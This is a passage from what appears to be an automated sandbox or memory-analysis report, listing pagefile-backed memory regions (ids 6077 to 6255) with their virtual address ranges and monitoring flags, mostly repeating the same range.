= "" Region: id = 6077 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6078 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6079 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6080 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6081 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6082 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6083 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6084 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6085 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6086 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6087 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6088 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6089 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6090 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6091 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6092 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6093 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6094 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6095 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6096 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6097 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6098 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6099 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6100 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6101 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6102 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6103 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6104 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6105 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6106 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6107 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6108 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6109 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6110 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6111 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6112 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6113 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6114 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6115 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6116 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6117 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6118 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6119 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6120 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6121 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6122 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6123 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6124 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6125 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6126 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6127 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6128 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6129 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6130 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6131 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6132 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6133 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6134 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6135 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6136 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6137 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6138 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6139 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6140 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6141 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6142 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6143 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6144 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6145 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6146 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6147 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6148 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6149 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6150 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6151 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6152 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6153 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6154 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6155 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6156 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6157 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6158 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6159 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6160 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6161 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6162 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6163 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6164 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6165 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6166 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6167 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6168 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6169 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6170 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6171 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6172 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6173 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6174 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6175 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6176 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6177 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6178 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6179 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6180 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6181 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6182 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6183 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6184 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6185 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6186 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6187 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6188 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6189 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6190 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6191 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6192 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6193 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6194 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6195 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6196 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6197 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6198 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6199 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6200 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6201 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6202 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6203 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6204 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6205 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6206 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6207 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6208 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6209 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6210 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6211 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6212 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6213 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6214 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6215 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6216 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6217 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6218 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6219 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6220 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6221 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6222 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6223 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6224 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6225 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6226 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6227 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6228 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6229 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6230 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6231 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6232 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6233 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6234 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6235 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6236 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6237 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6238 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6239 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6240 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 6241 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6242 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6243 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6244 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6245 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6246 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6247 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6248 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6249 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6250 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6251 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6252 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6253 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6254 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 6255 start_va = 0x44f0000 end_va = 0x44f4fff monitored 